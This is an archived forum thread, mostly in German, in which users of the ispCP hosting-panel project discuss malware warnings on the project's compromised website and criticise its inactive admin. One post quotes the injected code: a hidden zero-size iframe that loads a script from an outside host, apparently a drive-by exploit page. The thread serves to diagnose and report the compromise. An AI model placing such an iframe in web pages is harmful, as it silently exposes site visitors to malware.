+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega International Area (/forum-22.html)
+--- Forum: German Corner (/forum-26.html)
+--- Thread: Malware on isp-control.net (/thread-15942.html)
Pages: 1 2
Malware on isp-control.net - stucca - 03-22-2012 03:39 AM
My browser throw this message.
Bueno, la idea no es alarmar pero mi browser arrojo esto.
[attachment=1762]
[attachment=1763]
Salu2
RE: Malware on isp-control.net - marcaust - 03-22-2012 12:40 PM
auch bei mir kommt diese Meldung ;-(
RE: Malware on isp-control.net - stucca - 03-22-2012 12:43 PM
(03-22-2012 12:40 PM)marcaust Wrote: auch bei mir kommt diese Meldung ;-(
Sollten wir uns Sorgen machen?
RE: Malware on isp-control.net - ZooL - 03-22-2012 05:19 PM
mein viren scanner schlägt auch immer aus... also keine einzelfälle...
RE: Malware on isp-control.net - joximu - 03-22-2012 06:01 PM
Es ist was in der Seite eingebaut - vermutlich durch einen Angriff.
Code:
<iframe src="http://globalmin.net/mlt120312d/d6c80532fccf8efb1d885d89cdccad2a/spl.php" width="0" height="0"></iframe>Allerdings scheint diese URL nicht mehr zu funktionieren (mit wget gabs einen Fehler).
Leider kenne ich nur einen, der den Zugriff hat, das zu beheben - und der ist nur sporatisch da...
Vor ein paar Wochen war was anderes - die jquery.js war verändert, sodass dort etwas fremdes geladen wurde... - scheint jeweils "nur" die Website (also Wordpress) zu betreffen - nicht das Forum.
/Joxi
RE: Malware on isp-control.net - marcaust - 03-23-2012 02:37 AM
@stucca: Nicht direkt aber die Meldung bei Google und Firefox ist Negativ Werbung für das Projekt.
@joximu: Mein Scanner hat da gestern nen Download von geblockt...
Wenn derjenige nur Sporadisch Zeit hat, möchte ich anregen das da ein 2. die Berechtigungen erhällt sich darum zu kümmern. Insbesondere da das ja schon das 2. mal ist das was eingeschleust wurde.
und wenn derjenige sich dann nur um die Entfernung + schließen der Lücke kümmert. Dem Projekt würd es (denke ich) helfen
RE: Malware on isp-control.net - stucca - 03-23-2012 02:49 AM
(03-23-2012 02:37 AM)marcaust Wrote: @stucca: Nicht direkt aber die Meldung bei Google und Firefox ist Negativ Werbung für das Projekt.
@joximu: Mein Scanner hat da gestern nen Download von geblockt...
Wenn derjenige nur Sporadisch Zeit hat, möchte ich anregen das da ein 2. die Berechtigungen erhällt sich darum zu kümmern. Insbesondere da das ja schon das 2. mal ist das was eingeschleust wurde.
und wenn derjenige sich dann nur um die Entfernung + schließen der Lücke kümmert. Dem Projekt würd es (denke ich) helfen
@marcaust: Genau, ist es sehr schlechte Werbung für das Projekt.
RE: Malware on isp-control.net - angryispCP User - 03-23-2012 09:48 PM
(03-23-2012 02:49 AM)stucca Wrote:(03-23-2012 02:37 AM)marcaust Wrote: @stucca: Nicht direkt aber die Meldung bei Google und Firefox ist Negativ Werbung für das Projekt.
@joximu: Mein Scanner hat da gestern nen Download von geblockt...
Wenn derjenige nur Sporadisch Zeit hat, möchte ich anregen das da ein 2. die Berechtigungen erhällt sich darum zu kümmern. Insbesondere da das ja schon das 2. mal ist das was eingeschleust wurde.
und wenn derjenige sich dann nur um die Entfernung + schließen der Lücke kümmert. Dem Projekt würd es (denke ich) helfen
@marcaust: Genau, ist es sehr schlechte Werbung für das Projekt.
xD Ob ein Totes Projekt noch Werbung braucht, bezweifle ich ernsthaft ^^
Und vorallem: Was ist das für ein Admin, der es in 5 Tagen nicht schafft, sowas zu entfernen?? Er nimmt noch nicht mal die Seite offline mit dem Schadcode. Das finde ich einfach nur beschämend und werd mich nach alternativen umsehen, weil das was hier grade geboten wird, zeugt nicht von Verständnis für die Materie.
ich persönicn möchte nicht wissen, was sich so alles im ispCP Code versteckt, wenn der einzigste Entwickler hier noch nicht mal olch einfache Aufgaben auf die Reihe bekommt.
RE: Malware on isp-control.net - joximu - 03-24-2012 12:04 AM
Naja
ich stimme dir nur teilweise zu - ein Admin sollte das rasch beheben können - vorausgesetzt, er kennt WordPress einigermassen gut - scheint hier nicht der Fall zu sein, ansonsten die Site sperren - ja, das wäre fast besser als die Abstrafung in google... etc...
Was das aber mit der Code-Qualität des Projektes zu tun hat, weiss ich grad nicht, zumal die damaligen Entwickler ja gar nichts hiermit zu tun haben - und der aktuelle Admin bis zur aktuellen Stable (1.0.7) eigentlich kaum oder nur selten im Changelog auftritt...
Die 1.0.7 ist recht gut - und mit ein paar wenigen manuellen Änderungen kann man damit leben.
Allerdings sieht es momentan personell nicht so rosig aus und diese Malware-Sache fördert eigentlich nur den Untergang.
RE: Malware on isp-control.net - ZooL - 03-24-2012 07:37 PM
mit den aussagen die malte hier getroffen hat, das erst eine neue seite her muss damit es wieder weiter gehen kann hatte er recht aber seit dem kommt nix, die community macht tickets mit fixes aber niemand baut sie ein.. ist also wie erwähnt und festgestellt verschenkte zeit...hier etwas zu investieren..
man sollte besser auf die fork stable release version mit neuer engine und auto installer um satteln.. ich war von anfang an dabei aber entwickelt wird hier nicht mehr...
greetz